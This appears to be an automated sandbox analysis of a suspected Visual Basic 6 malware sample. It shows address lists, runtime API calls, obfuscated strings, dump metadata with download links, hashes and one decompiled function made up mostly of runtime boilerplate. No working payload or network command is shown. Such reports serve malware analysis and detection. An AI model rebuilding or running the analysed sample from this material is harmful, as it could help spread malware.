0x004123ca
0x004123cb
0x004123cc
0x004123d4
0x004123da
0x004123e0
0x004123ed
0x004123fe
0x00412404
0x00412406
0x00412413
0x00412438
0x00412415
0x00412415
0x0041241a
0x0041241f
0x00412425
0x0041242b
0x00412430
0x00412430
0x00412442
0x00412446
0x00412447
0x00412449
0x00412458
0x00412475
0x0041245a
0x0041245a
0x0041245f
0x00412464
0x00412469
0x00412469
0x00412499
0x0041249d
0x004124a2
0x004124ba
0x004124c0
0x004124c2
0x004124cf
0x004124f4
0x004124d1
0x004124d1
0x004124d6
0x004124db
0x004124e1
0x004124e7
0x004124ec
0x004124ec
0x004124fe
0x00412504
0x0041250e
0x00412511
0x00412518
0x0041251b
0x0041251c
0x00412526
0x0041252b
0x0041252c
0x00412531
0x00412536
0x00412540
0x00412545
0x00412546
0x0041254d
0x00412553
0x0041255d
0x00412561
0x00412562
0x00412564
0x0041256f
0x00412577
0x0041257c
0x00412585
0x0041258b
0x00412592
0x0041259c
0x004125a3
0x004125ad
0x004125ba
0x004125bb
0x004125bc
0x004125bd
0x004125c1
0x004125cb
0x004125cc
0x004125cd
0x004125ce
0x004125d7
0x004125dd
0x004125df
0x004125ec
0x0041260e
0x004125ee
0x004125ee
0x004125f3
0x004125f8
0x004125fb
0x00412601
0x00412606
0x00412606
0x004125ec
0x0041261b
0x0041261e
0x0041261f
0x00412664
0x0041266c
0x00412674
0x0041267c
0x00412681

APIs

__vbaChkstk.MSVBVM60(?,00401346), ref: 00411ACC
__vbaNew2.MSVBVM60(00403EF0,004134B0,?,?,?,?,00401346), ref: 00411B03
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403EE0,00000014), ref: 00411B65
__vbaHresultCheckObj.MSVBVM60(00000000,?,004042C8,000000C0), ref: 00411BC4
__vbaFreeObj.MSVBVM60(00000000,?,004042C8,000000C0), ref: 00411BE6
#539.MSVBVM60(?,00000001,00000001,00000001), ref: 00411BF5
__vbaStrVarMove.MSVBVM60(?,?,00000001,00000001,00000001), ref: 00411BFE
__vbaStrMove.MSVBVM60(?,?,00000001,00000001,00000001), ref: 00411C08
__vbaFreeVar.MSVBVM60(?,?,00000001,00000001,00000001), ref: 00411C10
__vbaNew2.MSVBVM60(00401DE0,00413010,?,?,00000001,00000001,00000001), ref: 00411C28
__vbaObjSet.MSVBVM60(?,00000000), ref: 00411C61
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403AA8,000001E8), ref: 00411CAE
#591.MSVBVM60(00000002), ref: 00411CD8
__vbaStrMove.MSVBVM60(00000002), ref: 00411CE2
__vbaStrCat.MSVBVM60(00404300,004042F8,00000000,00000002), ref: 00411CF2
__vbaStrMove.MSVBVM60(00404300,004042F8,00000000,00000002), ref: 00411CFC
__vbaStrCat.MSVBVM60(teger,00000000,00404300,004042F8,00000000,00000002), ref: 00411D07
__vbaStrMove.MSVBVM60(teger,00000000,00404300,004042F8,00000000,00000002), ref: 00411D11
__vbaStrCmp.MSVBVM60(00000000,teger,00000000,00404300,004042F8,00000000,00000002), ref: 00411D17
__vbaFreeStrList.MSVBVM60(00000003,?,?,?,00000000,teger,00000000,00404300,004042F8,00000000,00000002), ref: 00411D39
__vbaFreeObj.MSVBVM60(?,?,?,00401346), ref: 00411D44
__vbaFreeVar.MSVBVM60(?,?,?,00401346), ref: 00411D4C
__vbaVarDup.MSVBVM60 ref: 00411D70
#667.MSVBVM60(?), ref: 00411D79
__vbaStrMove.MSVBVM60(?), ref: 00411D83
__vbaFreeVar.MSVBVM60(?), ref: 00411D8B
__vbaNew2.MSVBVM60(00403EF0,004134B0,?,?,?,00401346), ref: 00411DA3
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403EE0,00000014), ref: 00411E05
__vbaHresultCheckObj.MSVBVM60(00000000,?,004042C8,000000F8), ref: 00411E61
__vbaStrMove.MSVBVM60(00000000,?,004042C8,000000F8), ref: 00411E8B
__vbaFreeObj.MSVBVM60(00000000,?,004042C8,000000F8), ref: 00411E93
__vbaNew2.MSVBVM60(00403EF0,004134B0), ref: 00411EAB
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403EE0,00000014), ref: 00411F0D
__vbaHresultCheckObj.MSVBVM60(00000000,?,004042C8,00000118), ref: 00411F6C
__vbaI2I4.MSVBVM60(00000000,?,004042C8,00000118), ref: 00411F86
__vbaFreeObj.MSVBVM60(00000000,?,004042C8,00000118), ref: 00411F92
#674.MSVBVM60(?,?,?,?,?,?,?,?,0000000A,0000000A), ref: 00411FD7
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,?,?,0000000A,0000000A), ref: 00411FDC
__vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A,?,?,?,?,?,?,?,?,0000000A,0000000A), ref: 00412018
__vbaNew2.MSVBVM60(00403EF0,004134B0,?,?,?,?,?,?,00401346), ref: 00412042
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403EE0,00000048), ref: 004120A6
__vbaStrMove.MSVBVM60(00000000,?,00403EE0,00000048), ref: 004120D0
#535.MSVBVM60(?,?,?,?,?,?,00401346), ref: 004120D5
#692.MSVBVM60(?,Pseudisodomic9,Naivitets,?,?,?,?,?,?,00401346), ref: 004120EB
__vbaVarTstNe.MSVBVM60(00008008,?), ref: 00412103
__vbaFreeVar.MSVBVM60(00008008,?), ref: 00412112
__vbaNew2.MSVBVM60(00401DE0,00413010,00008008,?), ref: 00412139
__vbaObjSet.MSVBVM60(?,00000000), ref: 00412172
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E24,00000060), ref: 004121B9
__vbaFpI4.MSVBVM60(00000000,?,00403E24,00000060), ref: 004121D3
__vbaHresultCheckObj.MSVBVM60(00000000,00401330,00402448,000002C8,?,?,?,?,00000000), ref: 00412241
__vbaFreeObj.MSVBVM60(?,?,?,?,00000000), ref: 00412258
__vbaNew2.MSVBVM60(00401DE0,00413010,00008008,?), ref: 00412270
__vbaObjSet.MSVBVM60(?,00000000), ref: 004122A9
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403AA8,000001F0), ref: 004122F6
__vbaNew2.MSVBVM60(00401DE0,00413010), ref: 0041231D
__vbaObjSet.MSVBVM60(?,00000000), ref: 00412356
__vbaChkstk.MSVBVM60(?,00000000), ref: 00412397
__vbaChkstk.MSVBVM60(?,00000000), ref: 004123AB
__vbaChkstk.MSVBVM60(?,00000000), ref: 004123BF
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C78,000001B4,?,?,00000000), ref: 0041242B
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,00000000), ref: 00412449
__vbaNew2.MSVBVM60(00401DE0,00413010,?,Pseudisodomic9,Naivitets,?,?,?,?,?,?,00401346), ref: 00412464
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041249D
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C78,00000170), ref: 004124E7
#591.MSVBVM60(00000008), ref: 0041251C
__vbaStrMove.MSVBVM60(00000008), ref: 00412526
__vbaStrCat.MSVBVM60(00404390,Stri,00000000,00000008), ref: 00412536
__vbaStrMove.MSVBVM60(00404390,Stri,00000000,00000008), ref: 00412540
__vbaStrCmp.MSVBVM60(00000000,00404390,Stri,00000000,00000008), ref: 00412546
__vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,00404390,Stri,00000000,00000008), ref: 00412564
__vbaFreeObj.MSVBVM60 ref: 0041256F
__vbaFreeVar.MSVBVM60 ref: 00412577
__vbaChkstk.MSVBVM60 ref: 004125AD
__vbaChkstk.MSVBVM60 ref: 004125C1
__vbaHresultCheckObj.MSVBVM60(00000000,00401330,00402448,000002B0), ref: 00412601
__vbaFreeStr.MSVBVM60(00412682), ref: 00412664
__vbaFreeStr.MSVBVM60(00412682), ref: 0041266C
__vbaFreeStr.MSVBVM60(00412682), ref: 00412674
__vbaFreeStr.MSVBVM60(00412682), ref: 0041267C

Strings

Stri, xrefs: 0041252C
SAMMENSTILLINGERNE, xrefs: 00411D5C
Pseudisodomic9, xrefs: 004120E2
teger, xrefs: 00411D02
Naivitets, xrefs: 004120DD

Memory Dump Source

Source File: 00000000.00000002.686342372.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686338365.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686356771.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686361470.0000000000415000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$Move$New2$Chkstk$List$#591$#535#539#667#674#692
String ID: Naivitets$Pseudisodomic9$SAMMENSTILLINGERNE$Stri$teger
API String ID: 4272933505-1894742847
Opcode ID: 3cb44d211bc3913ac7c28c302403ef8ca6222e2a6b02467e3ead431ecadf0fac
Instruction ID: 9e64df594bf453710323d88daf7b68fde699744cdbe7891fdf1f4e70b79a26bb
Opcode Fuzzy Hash: 3cb44d211bc3913ac7c28c302403ef8ca6222e2a6b02467e3ead431ecadf0fac
Instruction Fuzzy Hash: 0E622874A00218EFDB21DF90CC45BDDBBB4BF49305F1040EAE549BB2A1DBB85A858F59

Uniqueness

Uniqueness Score: -1.00%

Function 0040FEDD, Relevance: 138.9, APIs: 77, Strings: 2, Instructions: 639
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E0040FEDD(void* __ebx, void* __edi, void* __esi, void* _a4, void* _a28) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v28;
				intOrPtr _v32;
				char _v36;
				void* _v40;
				signed int _v44;
				char _v48;
				char _v52;
				signed int _v56;
				signed int _v60;
				char _v64;
				long long _v72;
				char _v80;
				long long _v88;
				char _v96;
				intOrPtr _v104;
				char _v112;
				intOrPtr _v120;
				char _v128;
				char* _v136;
				char _v144;
				intOrPtr _v168;
				char _v176;
				void* _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v228;
				signed int _v232;
				long long _v236;
				intOrPtr* _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				intOrPtr* _v256;
				intOrPtr* _v260;
				signed int _v264;
				signed int _v268;
				intOrPtr* _v272;
				signed int _v276;
				intOrPtr* _v280;
				signed int _v284;
				signed int _v288;
				intOrPtr* _v292;
				signed int _v296;
				intOrPtr* _v300;
				signed int _v304;
				signed int _t315;
				char* _t321;
				signed int _t322;
				char* _t326;
				signed int _t329;
				signed int _t330;
				signed int _t334;
				signed int _t337;
				signed int _t338;
				signed int _t349;
				signed int _t353;
				short _t354;
				signed int _t363;
				signed int _t367;
				signed int _t371;
				signed int _t379;
				signed int _t389;
				signed int _t393;
				signed int _t406;
				signed int _t412;
				signed int _t416;
				char* _t418;
				signed int _t421;
				signed int _t428;
				signed int _t434;
				void* _t494;
				void* _t496;
				intOrPtr _t497;
				void* _t498;

				_t497 = _t496 - 0xc;
				 *[fs:0x0] = _t497;
				L00401340();
				_v16 = _t497;
				_v12 = 0x401290;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401346, _t494);
				L00401556();
				_v88 = 0x80020004;
				_v96 = 0xa;
				_v72 = 0xc;
				_v80 = 2;
				_push(1);
				_push(1);
				_push( &_v96);
				_push( &_v80);
				_push( &_v112); // executed
				L0040148A(); // executed
				_v168 = 0xc;
				_v176 = 0x8002;
				_push( &_v112);
				_t315 =  &_v176;
				_push(_t315);
				L00401490();
				_v200 = _t315;
				_push( &_v112);
				_push( &_v96);
				_push( &_v80);
				_push(3);
				L0040153E();
				_t498 = _t497 + 0x10;
				if(_v200 != 0) {
					if( *0x4134b0 != 0) {
						_v240 = 0x4134b0;
					} else {
						_push(0x4134b0);
						_push(0x403ef0);
						L00401592();
						_v240 = 0x4134b0;
					}
					_v200 =  *_v240;
					_t428 =  *((intOrPtr*)( *_v200 + 0x4c))(_v200,  &_v56);
					asm("fclex");
					_v204 = _t428;
					if(_v204 >= 0) {
						_v244 = _v244 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x403ee0);
						_push(_v200);
						_push(_v204);
						L0040158C();
						_v244 = _t428;
					}
					_v208 = _v56;
					_v136 = 0xfa;
					_v144 = 2;
					L00401340();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t434 =  *((intOrPtr*)( *_v208 + 0x1c))(_v208, 0x10,  &_v60);
					asm("fclex");
					_v212 = _t434;
					if(_v212 >= 0) {
						_v248 = _v248 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x403f44);
						_push(_v208);
						_push(_v212);
						L0040158C();
						_v248 = _t434;
					}
					_v228 = _v60;
					_v60 = _v60 & 0x00000000;
					_push(_v228);
					_push( &_v36);
					L00401598();
					L0040155C();
				}
				_v136 = _a4;
				_v144 = 9;
				L0040154A();
				_t321 =  &_v80;
				_push(_t321);
				L00401484();
				_v200 =  ~(0 | _t321 != 0x0000ffff);
				L00401562();
				_t322 = _v200;
				if(_t322 != 0) {
					_t406 =  *((intOrPtr*)( *_a4 + 0x160))(_a4,  &_v56);
					asm("fclex");
					_v200 = _t406;
					if(_v200 >= 0) {
						_v252 = _v252 & 0x00000000;
					} else {
						_push(0x160);
						_push(0x402448);
						_push(_a4);
						_push(_v200);
						L0040158C();
						_v252 = _t406;
					}
					if( *0x4134b0 != 0) {
						_v256 = 0x4134b0;
					} else {
						_push(0x4134b0);
						_push(0x403ef0);
						L00401592();
						_v256 = 0x4134b0;
					}
					_v212 =  *_v256;
					if( *0x413010 != 0) {
						_v260 = 0x413010;
					} else {
						_push(0x413010);
						_push(0x401de0);
						L00401592();
						_v260 = 0x413010;
					}
					_t412 =  &_v60;
					L00401598();
					_v204 = _t412;
					_t416 =  *((intOrPtr*)( *_v204 + 0x1e0))(_v204,  &_v44, _t412,  *((intOrPtr*)( *((intOrPtr*)( *_v260)) + 0x304))( *_v260));
					asm("fclex");
					_v208 = _t416;
					if(_v208 >= 0) {
						_v264 = _v264 & 0x00000000;
					} else {
						_push(0x1e0);
						_push(0x403aa8);
						_push(_v204);
						_push(_v208);
						L0040158C();
						_v264 = _t416;
					}
					_v232 = _v56;
					_v56 = _v56 & 0x00000000;
					_t418 =  &_v64;
					L00401598();
					_t421 =  *((intOrPtr*)( *_v212 + 0x40))(_v212, _t418, _t418, _v232, _v44);
					asm("fclex");
					_v216 = _t421;
					if(_v216 >= 0) {
						_v268 = _v268 & 0x00000000;
					} else {
						_push(0x40);
						_push(0x403ee0);
						_push(_v212);
						_push(_v216);
						L0040158C();
						_v268 = _t421;
					}
					L00401538();
					_push( &_v64);
					_t322 =  &_v60;
					_push(_t322);
					_push(2);
					L00401568();
					_t498 = _t498 + 0xc;
				}
				_push(0x4041a8);
				_push(0x4041b0);
				L0040147E();
				L00401508();
				_push(_t322);
				_push(0x403ff0);
				L0040147E();
				L00401508();
				L00401538();
				_push(1);
				_push(_v32);
				L00401472();
				L00401508();
				_push(_t322);
				_push(0x403ff0);
				L00401478();
				asm("sbb eax, eax");
				_v200 =  ~( ~( ~_t322));
				L00401538();
				_t326 = _v200;
				if(_t326 != 0) {
					_v120 = 0x80020004;
					_v128 = 0xa;
					_v104 = 0x80020004;
					_v112 = 0xa;
					_v88 = 0x80020004;
					_v96 = 0xa;
					if( *0x413010 != 0) {
						_v272 = 0x413010;
					} else {
						_push(0x413010);
						_push(0x401de0);
						L00401592();
						_v272 = 0x413010;
					}
					_t389 =  &_v56;
					L00401598();
					_v200 = _t389;
					_t393 =  *((intOrPtr*)( *_v200 + 0x158))(_v200,  &_v44, _t389,  *((intOrPtr*)( *((intOrPtr*)( *_v272)) + 0x304))( *_v272));
					asm("fclex");
					_v204 = _t393;
					if(_v204 >= 0) {
						_v276 = _v276 & 0x00000000;
					} else {
						_push(0x158);
						_push(0x403aa8);
						_push(_v200);
						_push(_v204);
						L0040158C();
						_v276 = _t393;
					}
					_v236 = _v44;
					_v44 = _v44 & 0x00000000;
					_v72 = _v236;
					_v80 = 8;
					_push( &_v128);
					_push( &_v112);
					_push( &_v96);
					_push(0);
					_push( &_v80);
					L004014F6();
					L0040155C();
					_push( &_v128);
					_push( &_v112);
					_push( &_v96);
					_t326 =  &_v80;
					_push(_t326);
					_push(4);
					L0040153E();
					_t498 = _t498 + 0x14;
				}
				_push(0x403ff8);
				_push(0x403abc);
				L0040147E();
				L00401508();
				_push(_t326);
				L00401466();
				_push(_t326);
				_push( &_v80);
				L0040146C();
				_v136 = 0x4041b0;
				_v144 = 0x8008;
				_push( &_v80);
				_t329 =  &_v144;
				_push(_t329);
				L00401490();
				_v200 = _t329;
				L00401538();
				L00401562();
				_t330 = _v200;
				if(_t330 != 0) {
					L00401544();
					_push(_t330);
					_t363 =  &_v60;
					_push(_t363);
					L00401598();
					_v208 = _t363;
					_v120 = 0x80020004;
					_v128 = 0xa;
					_v104 = 0x80020004;
					_v112 = 0xa;
					_v88 = 0x80020004;
					_v96 = 0xa;
					_v72 = 0x80020004;
					_v80 = 0xa;
					if( *0x413010 != 0) {
						_v280 = 0x413010;
					} else {
						_push(0x413010);
						_push(0x401de0);
						L00401592();
						_v280 = 0x413010;
					}
					_t367 =  &_v56;
					L00401598();
					_v200 = _t367;
					_t371 =  *((intOrPtr*)( *_v200 + 0x98))(_v200,  &_v196, _t367,  *((intOrPtr*)( *((intOrPtr*)( *_v280)) + 0x300))( *_v280));
					asm("fclex");
					_v204 = _t371;
					if(_v204 >= 0) {
						_v284 = _v284 & 0x00000000;
					} else {
						_push(0x98);
						_push(0x403c78);
						_push(_v200);
						_push(_v204);
						L0040158C();
						_v284 = _t371;
					}
					_t379 =  *((intOrPtr*)( *_v208 + 0x44))(_v208, _v196,  &_v80,  &_v96,  &_v112,  &_v128);
					asm("fclex");
					_v212 = _t379;
					if(_v212 >= 0) {
						_v288 = _v288 & 0x00000000;
					} else {
						_push(0x44);
						_push(0x403e94);
						_push(_v208);
						_push(_v212);
						L0040158C();
						_v288 = _t379;
					}
					_push( &_v60);
					_push( &_v56);
					_push(2);
					L00401568();
					_push( &_v128);
					_push( &_v112);
					_push( &_v96);
					_push( &_v80);
					_push(4);
					L0040153E();
					_t498 = _t498 + 0x20;
				}
				if( *0x413010 != 0) {
					_v292 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x401de0);
					L00401592();
					_v292 = 0x413010;
				}
				_t334 =  &_v56;
				L00401598();
				_v200 = _t334;
				_t337 =  *((intOrPtr*)( *_v200 + 0x22c))(_v200, _t334,  *((intOrPtr*)( *((intOrPtr*)( *_v292)) + 0x308))( *_v292));
				asm("fclex");
				_v204 = _t337;
				if(_v204 >= 0) {
					_v296 = _v296 & 0x00000000;
				} else {
					_push(0x22c);
					_push(0x403aa8);
					_push(_v200);
					_push(_v204);
					L0040158C();
					_v296 = _t337;
				}
				L0040155C();
				_v72 =  *0x401288;
				_v80 = 5;
				_t338 =  &_v80;
				_push(_t338);
				L00401460();
				L00401508();
				_push(_t338);
				_push(L"Doub");
				_push(0x4041c8);
				L0040147E();
				L00401508();
				_push(_t338);
				_push(0x4041d0);
				L0040147E();
				L00401508();
				_push(_t338);
				L00401478();
				asm("sbb eax, eax");
				_v200 =  ~( ~( ~_t338));
				_push( &_v52);
				_push( &_v48);
				_push( &_v44);
				_push(3);
				L0040156E();
				L00401562();
				if(_v200 != 0) {
					_v120 = 0x80020004;
					_v128 = 0xa;
					_v104 = 0x80020004;
					_v112 = 0xa;
					_v88 = 0x80020004;
					_v96 = 0xa;
					_v136 = L"Fraela";
					_v144 = 8;
					L0040154A();
					_push( &_v128);
					_push( &_v112);
					_push( &_v96);
					_push(0);
					_push( &_v80);
					L004014F6();
					_push( &_v128);
					_push( &_v112);
					_push( &_v96);
					_push( &_v80);
					_push(4);
					L0040153E();
				}
				L0040145A();
				if( *0x413010 != 0) {
					_v300 = 0x413010;
				} else {
					_push(0x413010);
					_push(0x401de0);
					L00401592();
					_v300 = 0x413010;
				}
				_t349 =  &_v56;
				L00401598();
				_v200 = _t349;
				_t353 =  *((intOrPtr*)( *_v200 + 0x168))(_v200,  &_v196, _t349,  *((intOrPtr*)( *((intOrPtr*)( *_v300)) + 0x304))( *_v300));
				asm("fclex");
				_v204 = _t353;
				if(_v204 >= 0) {
					_v304 = _v304 & 0x00000000;
				} else {
					_push(0x168);
					_push(0x403aa8);
					_push(_v200);
					_push(_v204);
					L0040158C();
					_v304 = _t353;
				}
				_t354 = _v196;
				_v28 = _t354;
				L0040155C();
				asm("wait");
				_push(0x410963);
				L00401538();
				L0040155C();
				L00401538();
				return _t354;
			}

0x0040fee0
0x0040feef
0x0040fefb
0x0040ff03
0x0040ff06
0x0040ff0d
0x0040ff1c
0x0040ff25
0x0040ff2a
0x0040ff31
0x0040ff38
0x0040ff3f
0x0040ff46
0x0040ff48
0x0040ff4d
0x0040ff51
0x0040ff55
0x0040ff56
0x0040ff5b
0x0040ff65
0x0040ff72
0x0040ff73
0x0040ff79
0x0040ff7a
0x0040ff7f
0x0040ff89
0x0040ff8d
0x0040ff91
0x0040ff92
0x0040ff94
0x0040ff99
0x0040ffa5
0x0040ffb2
0x0040ffcf
0x0040ffb4
0x0040ffb4
0x0040ffb9
0x0040ffbe
0x0040ffc3
0x0040ffc3
0x0040ffe1
0x0040fff9
0x0040fffc
0x0040fffe
0x0041000b
0x0041002d
0x0041000d
0x0041000d
0x0041000f
0x00410014
0x0041001a
0x00410020
0x00410025
0x00410025
0x00410037
0x0041003d
0x00410047
0x00410058
0x00410065
0x00410066
0x00410067
0x00410068
0x00410077
0x0041007a
0x0041007c
0x00410089
0x004100ab
0x0041008b
0x0041008b
0x0041008d
0x00410092
0x00410098
0x0041009e
0x004100a3
0x004100a3
0x004100b5
0x004100bb
0x004100bf
0x004100c8
0x004100c9
0x004100d1
0x004100d1
0x004100d9
0x004100df
0x004100f2
0x004100f7
0x004100fa
0x004100fb
0x0041010b
0x00410115
0x0041011a
0x00410123
0x00410135
0x0041013b
0x0041013d
0x0041014a
0x0041016c
0x0041014c
0x0041014c
0x00410151
0x00410156
0x00410159
0x0041015f
0x00410164
0x00410164
0x0041017a
0x00410197
0x0041017c
0x0041017c
0x00410181
0x00410186
0x0041018b
0x0041018b
0x004101a9
0x004101b6
0x004101d3
0x004101b8
0x004101b8
0x004101bd
0x004101c2
0x004101c7
0x004101c7
0x004101f7
0x004101fb
0x00410200
0x00410218
0x0041021e
0x00410220
0x0041022d
0x00410252
0x0041022f
0x0041022f
0x00410234
0x00410239
0x0041023f
0x00410245
0x0041024a
0x0041024a
0x0041025c
0x00410262
0x0041026f
0x00410273
0x00410287
0x0041028a
0x0041028c
0x00410299
0x004102bb
0x0041029b
0x0041029b
0x0041029d
0x004102a2
0x004102a8
0x004102ae
0x004102b3
0x004102b3
0x004102c5
0x004102cd
0x004102ce
0x004102d1
0x004102d2
0x004102d4
0x004102d9
0x004102d9
0x004102dc
0x004102e1
0x004102e6
0x004102f0
0x004102f5
0x004102f6
0x004102fb
0x00410305
0x0041030d
0x00410312
0x00410314
0x00410317
0x00410321
0x00410326
0x00410327
0x0041032c
0x00410333
0x00410339
0x00410343
0x00410348
0x00410351
0x00410357
0x0041035e
0x00410365
0x0041036c
0x00410373
0x0041037a
0x00410388
0x004103a5
0x0041038a
0x0041038a
0x0041038f
0x00410394
0x00410399
0x00410399
0x004103c9
0x004103cd
0x004103d2
0x004103ea
0x004103f0
0x004103f2
0x004103ff
0x00410424
0x00410401
0x00410401
0x00410406
0x0041040b
0x00410411
0x00410417
0x0041041c
0x0041041c
0x0041042e
0x00410434
0x0041043e
0x00410441
0x0041044b
0x0041044f
0x00410453
0x00410454
0x00410459
0x0041045a
0x00410462
0x0041046a
0x0041046e
0x00410472
0x00410473
0x00410476
0x00410477
0x00410479
0x0041047e
0x0041047e
0x00410481
0x00410486
0x0041048b
0x00410495
0x0041049a
0x0041049b
0x004104a0
0x004104a4
0x004104a5
0x004104aa
0x004104b4
0x004104c1
0x004104c2
0x004104c8
0x004104c9
0x004104ce
0x004104d8
0x004104e0
0x004104e5
0x004104ee
0x004104f4
0x004104f9
0x004104fa
0x004104fd
0x004104fe
0x00410503
0x00410509
0x00410510
0x00410517
0x0041051e
0x00410525
0x0041052c
0x00410533
0x0041053a
0x00410548
0x00410565
0x0041054a
0x0041054a
0x0041054f
0x00410554
0x00410559
0x00410559
0x00410589
0x0041058d
0x00410592
0x004105ad
0x004105b3
0x004105b5
0x004105c2
0x004105e7
0x004105c4
0x004105c4
0x004105c9
0x004105ce
0x004105d4
0x004105da
0x004105df
0x004105df
0x00410614
0x00410617
0x00410619
0x00410626
0x00410648
0x00410628
0x00410628
0x0041062a
0x0041062f
0x00410635
0x0041063b
0x00410640
0x00410640
0x00410652
0x00410656
0x00410657
0x00410659
0x00410664
0x00410668
0x0041066c
0x00410670
0x00410671
0x00410673
0x00410678
0x00410678
0x00410682
0x0041069f
0x00410684
0x00410684
0x00410689
0x0041068e
0x00410693
0x00410693
0x004106c3
0x004106c7
0x004106cc
0x004106e0
0x004106e6
0x004106e8
0x004106f5
0x0041071a
0x004106f7
0x004106f7
0x004106fc
0x00410701
0x00410707
0x0041070d
0x00410712
0x00410712
0x00410724
0x0041072f
0x00410732
0x00410739
0x0041073c
0x0041073d
0x00410747
0x0041074c
0x0041074d
0x00410752
0x00410757
0x00410761
0x00410766
0x00410767
0x0041076c
0x00410776
0x0041077b
0x0041077c
0x00410783
0x00410789
0x00410793
0x00410797
0x0041079b
0x0041079c
0x0041079e
0x004107a9
0x004107b7
0x004107b9
0x004107c0
0x004107c7
0x004107ce
0x004107d5
0x004107dc
0x004107e3
0x004107ed
0x00410800
0x00410808
0x0041080c
0x00410810
0x00410811
0x00410816
0x00410817
0x0041081f
0x00410823
0x00410827
0x0041082b
0x0041082c
0x0041082e
0x00410833
0x00410836
0x00410842
0x0041085f
0x00410844
0x00410844
0x00410849
0x0041084e
0x00410853
0x00410853
0x00410883
0x00410887
0x0041088c
0x004108a7
0x004108ad
0x004108af
0x004108bc
0x004108e1
0x004108be
0x004108be
0x004108c3
0x004108c8
0x004108ce
0x004108d4
0x004108d9
0x004108d9
0x004108e8
0x004108ef
0x004108f6
0x004108fb
0x004108fc
0x0041094d
0x00410955
0x0041095d
0x00410962

APIs

__vbaChkstk.MSVBVM60(?,00401346), ref: 0040FEFB
__vbaStrCopy.MSVBVM60(?,?,?,?,00401346), ref: 0040FF25
#660.MSVBVM60(?,00000002,0000000A,00000001,00000001), ref: 0040FF56
__vbaVarTstNe.MSVBVM60(00008002,?), ref: 0040FF7A
__vbaFreeVarList.MSVBVM60(00000003,00000002,0000000A,?,00008002,?), ref: 0040FF94
__vbaNew2.MSVBVM60(00403EF0,004134B0,?,?,?,00401346), ref: 0040FFBE
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403EE0,0000004C), ref: 00410020
__vbaChkstk.MSVBVM60(?), ref: 00410058
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403F44,0000001C), ref: 0041009E
__vbaObjSet.MSVBVM60(?,?), ref: 004100C9
__vbaFreeObj.MSVBVM60(?,?), ref: 004100D1
__vbaVarDup.MSVBVM60(?,?), ref: 004100F2
#562.MSVBVM60(?), ref: 004100FB
__vbaFreeVar.MSVBVM60(?), ref: 00410115
__vbaHresultCheckObj.MSVBVM60(00000000,00401290,00402448,00000160), ref: 0041015F
__vbaNew2.MSVBVM60(00403EF0,004134B0), ref: 00410186
__vbaNew2.MSVBVM60(00401DE0,00413010), ref: 004101C2
__vbaObjSet.MSVBVM60(?,00000000), ref: 004101FB
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403AA8,000001E0), ref: 00410245
__vbaObjSet.MSVBVM60(?,?,?), ref: 00410273
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403EE0,00000040), ref: 004102AE
__vbaFreeStr.MSVBVM60(00000000,?,00403EE0,00000040), ref: 004102C5
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 004102D4
__vbaStrCat.MSVBVM60(004041B0,004041A8,?), ref: 004102E6
__vbaStrMove.MSVBVM60(004041B0,004041A8,?), ref: 004102F0
__vbaStrCat.MSVBVM60(00403FF0,00000000,004041B0,004041A8,?), ref: 004102FB
__vbaStrMove.MSVBVM60(00403FF0,00000000,004041B0,004041A8,?), ref: 00410305
__vbaFreeStr.MSVBVM60(00403FF0,00000000,004041B0,004041A8,?), ref: 0041030D
#618.MSVBVM60(?,00000001,00403FF0,00000000,004041B0,004041A8,?), ref: 00410317
__vbaStrMove.MSVBVM60(?,00000001,00403FF0,00000000,004041B0,004041A8,?), ref: 00410321
__vbaStrCmp.MSVBVM60(00403FF0,00000000,?,00000001,00403FF0,00000000,004041B0,004041A8,?), ref: 0041032C
__vbaFreeStr.MSVBVM60(00403FF0,00000000,?,00000001,00403FF0,00000000,004041B0,004041A8,?), ref: 00410343
__vbaNew2.MSVBVM60(00401DE0,00413010,00403FF0,00000000,?,00000001,00403FF0,00000000,004041B0,004041A8,?), ref: 00410394
__vbaObjSet.MSVBVM60(?,00000000), ref: 004103CD
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403AA8,00000158), ref: 00410417
#595.MSVBVM60(00000008,00000000,0000000A,0000000A,0000000A), ref: 0041045A
__vbaFreeObj.MSVBVM60(00000008,00000000,0000000A,0000000A,0000000A), ref: 00410462
__vbaFreeVarList.MSVBVM60(00000004,00000008,0000000A,0000000A,0000000A,00000008,00000000,0000000A,0000000A,0000000A), ref: 00410479
__vbaStrCat.MSVBVM60(00403ABC,00403FF8,00403FF0,00000000,?,00000001,00403FF0,00000000,004041B0,004041A8,?), ref: 0041048B
